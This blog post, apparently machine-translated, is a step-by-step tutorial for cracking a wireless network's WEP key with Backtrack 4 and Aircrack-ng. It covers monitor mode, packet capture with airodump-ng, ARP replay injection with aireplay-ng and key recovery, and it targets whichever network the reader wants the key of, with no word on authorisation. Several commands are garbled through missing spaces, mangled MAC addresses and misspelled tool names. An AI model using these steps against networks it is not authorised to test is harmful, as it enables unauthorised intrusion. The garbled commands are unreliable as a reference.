Backtrack is a Linux distribution designed for wireless auditing and general computer security in the network is now in its fourth version, and unlike some others in that it brings more than 300 applications for network management, among which is Aircrack-ng. A version of Aircrack for Windows, but does not work with most wireless cards, and the need to create a driver for each card that supports Aircrack, and that is far from the reach of any average user. The Aircrack suite is a set of tools to decrypt WEP key once it has captured a sufficient number of packages that use the wireless network encryption.
Turning to Backtrack 4 , you can download the iso from the official web , and then burn it to DVD. Also you have the option to install Backtrack on USB flash drive of at least 2GB Unetbootin tool, or install on a virtual machine (VMware), but we leave for more advanced users. Speaking of users, I have to make clear that this tutorial / manual / guide is aimed at users with basic knowledge of linux, that is, who can at least manage the console ( Shell ). If you do not know I'm talking about, better not read on and call the nearest computer.
Once we have our DVD of Backtrack, or in my case installed on a USB stick, boot the operating system, and chose the default option (default). I will not stand to explain how a DVD boots, as there are many online manuals on how to do so by changing the settings in the BIOS. When the system is started, if requested login is "root" and no password. Then I typed "startx" and press Enter to start the GUI. Backtrack 4 comes with the KDE 3.5 desktop environment. I personally do not like, I prefer GNOME, but that is the taste of each.
The first thing to check is that when we click on each key on the keyboard, print the corresponding character. If it is not necessary to select the keyboard layout that best suits. The default configuration comes with the U.S., but that causes problems (at least to me), because, for example by clicking on the button script, character other than print. Below right, an icon representing a flag, which when pressed changes the keyboard configuration. As is the English keyboard option, chosen as Germany, which amounts to the same configuration. Once that little problem solved, now we start what really interests us.
first thing is to see if our system has detected the wireless card. For that we open a console and run the command "ifconfig". A list of the different network cards in our PC. They often have names like wifi0, ath0, or the most common case, wlan0. To verify that it works correctly, type the command airodump-ng and the name of the card, for example, "airodump-ng wlan0." If all goes well, begin to display a list of available wireless networks within reach, with its corresponding MAC address (BSSID), channel (CH), the network name (ESSID), encryption (WEP / WPA), and other important information. If you can not see this, you will probably because the system does not support your wireless card. We must take note of the wireless network data from which we want to get your WEP key, and close the console.
Open a new console and run "airmon start wlan0 6." Where it says "6", you must put the wireless network channel. The command that does is put the wifi card in monitor mode on channel specified channel, which can be from 1 to 12. If your wifi card is compatible see a message like "managed mode on" or "monitor mode enabled." Entering monitor mode can take two things: Either the name of the wifi interface does not change (still wifi0/ath0/wlan0), or create a new interface with a new name which is running the way monitor. In my case it creates a new interface named "mon0" from which to work from now.
almost always the main problem when monitoring wireless networks in linux has to do with the drivers for these cards, or because there are no such drivers, or they exist but are not designed to work in monitor mode. My wifi card is the Realtek RTL 8187B, and before the launch Backtrack 4, there was no driver that actually works. So if your card is not supported now, you probably have to wait to develop drivers for future versions of Backtrack, or buy a new one that does have support.
When we get our card into monitor mode, the next thing we have to do is run the command "airodump-ng-w-c6 mon0 key." And that it does is go guardardando all packets flowing through the channel 6 (-c6) in the key file. With the-w option must specify the path and file name where we want to be storing the packets. Backtrack 4 In that file is named as "key-01.cap" and if you do not specify a route is saved in the default directory, ie on the desktop. But keep in mind that when you switch off the computer, the file. "Cap" will be deleted, so I would recommend you keep on your hard disk. So if you have several files. "Cap" of several different catches, may be combined as explained later.
Open a new console, and the earlier we leave open for keeping the traffic go wifi. Now it really begins well. Run the command "aireplay-ng -1 30-e WLAN_32-a e0: 91:53:23: cd: 99-h 00:21:63:04:54:4 d mon0." Instead of "WLAN_32" we must put the name of the network. Eye on the distinction between upper or miniscule, because it will not work, and if the name of the network comes to space, we put it in quotes. Where it says "e0: 91:53:23: cd: 99", we must put the MAC address (BSSID) of the wifi network, and where it says "00:21:63:04:54:4 d", you ought to put mac address of your wifi card. An easy way to find out what the mac of your card is, from Windows, the command prompt (CMD) run the command "ipconfig-all."
The next step is, from another new console, run "aireplay-ng -3-b x600 e0: 91:53:23: cd: 99-h 00:21:63:04:54:4 d mon0. " With these last two commands we do is start reading and sending and receiving ARP packets and save them, what is known as an injection. From now on we must look at the column "data" of the first console to leave open. In that column shows the number of captured packets (IVs). To crack a WEP key of 64 bits, it will take more than 5000 50000-60000 packages up to a maximum, and 128-bit WEP key will be needed about 100000 packets. This process can take between 10 minutes and 3 hours, it depends on the signal quality and whether the owner is using the network, ie there is traffic. If all else fails it may be because there are some wifi routers that are prepared to avoid the injection.
When the number of captured packets approaching the number of packets sufficient to decrypt the key, in a new console run the command "aircrack-ng-01.cap key." With this we will list the names of the networks and the number of IVs captured. Select the network concerned, and automatically start the decryption key using brute force, ie testing that goes all the possible key combinations on the captured packets until it finds the key. WEP encryption is between 1048576 and 4294967296 different keys, so the process may take more or less depending on the number of captured packets (the more the better) and the power of our processor. The key will be displayed in ASCII format, and is usually a set of numbers and letters (hex).
Finally, I need to add that if disponeis several files. "Cap" of several catches before, the command aircrack-ng can combine, so that if, for example, you have the bad luck that your card inject too slowly and only you can capture enough packets 5000 for decryption, you can try another day to do the same process and capture other new 5000 packages and then run "aircrak-ng-01.cap key key-key-03.cap 02.cap ...". Aircrak will add up all the packages on the same network, and decrypt the WEP key.
0 comments:
Post a Comment